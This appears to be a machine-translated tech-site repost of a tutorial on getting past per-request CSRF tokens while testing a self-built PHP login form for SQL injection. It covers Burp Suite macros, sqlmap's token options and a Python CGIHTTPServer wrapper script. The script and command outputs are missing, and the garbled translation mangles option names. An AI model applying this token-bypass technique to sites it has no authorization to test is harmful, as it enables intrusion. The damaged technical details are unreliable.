Shulou(Shulou.com)06/02 Report--

It is believed that many inexperienced people have no idea about how to use Python CGIHTTPServer to bypass the CSRF Token defense during injection. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Preface

CSRF tokens is a series of random values generated by the server, and its main purpose is to prevent form repeated submission and request forgery attacks. Because the generated value is random, one-time, and is generated based on a previous request on the server side, it is almost impossible for a hacker to forge it.

Burp Suite

Just because we can't forge it doesn't mean we can't get around it. Here, I have to mention a web penetration artifact, Burp.

Suite . There are several ways to configure Burp to use macros to bypass CSRF tokens on HTML forms. For example, we can use Burp Active

Scans,Burp Intruder,Burp Repeater, even Burp.

Proxy . There are also Grep-Extract and pitchfork attack types specific to Intruder modules. If you don't think it's enough, Burp's perfect extensibility allows you to develop your own Burp plug-ins.

In addition to Burp, another artifact, Sqlmap, provides us with similar features. Sqlmap has a-csrf-token and-csrf-url parameters that can be used to bypass CSRF tokens. Or you can, as I just said, configure Burp to use-proxy to run sqlmap through Burp.

But today I'm going to introduce another way to get around it, even with Python CGIHTTPServer.

Experimental environment

My test environment is a simple PHP+mysql where I can log in and access restricted areas. I uploaded the PHP code here, which you can download and test. The code may not be perfect, but it should not be a problem for testing purposes.

CSRF tokens is the SHA256 hash of randomly generated numbers, and the hash value of each HTTP request is different.

Therefore, if Burp is not specifically configured, it will not be able to detect the existence of the problem.

The same goes for sqlmap.

I use the-technique,-dbms and-p options to speed up the scan. Because this is just a simple Boolean-based SQLi, so-level

1 (default) is sufficient. However, if the credentials are incorrect, you must set-risk to 3. Because only when the risk level is 3 can the Boolean-based SQLi be detected. Boolean-based SQLi is very dangerous because they can make any condition true. For example, when this injection exists in the WHERE clause of a UPDATE or DELETE statement, an attacker can change the user's password in the database, dump credentials, and so on.

Here, I detected an OR-based SQLi using the SQLi-csrf-token = "mytoken" option of sqlmap:

This is a login authentication form, and obviously here is a SELECT statement, which means that risk level 3 is harmless.

Of course, if you have valid credentials, it is also vulnerable to AND-based SQLi attacks. But even if I had valid credentials, I would test with another (valid) user name and find the OR-based SQLi first. Doing so will prevent the account from being locked out.

In addition, using sqlmap's SQLi-csrf-token = "mytoken" option, I detected an AND-based SQLi:

CGIHTTPServer

First, let's create a CGI script:

This script needs to be created in the folder_whatever/cgi-bin/ directory. We call it mask.py and make sure it is executable. Once created, we run "python" from the "folder_whatever" directory

-m CGIHTTPServer ". By default, it listens on the 8000/tcp port.

You can test it with the correct password:

And use an incorrect password:

Now, we can easily detect security vulnerabilities without specific configuration of Burp and sqlmap.

After reading the above, have you learned how to use Python CGIHTTPServer to bypass the CSRF Token defense during injection? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.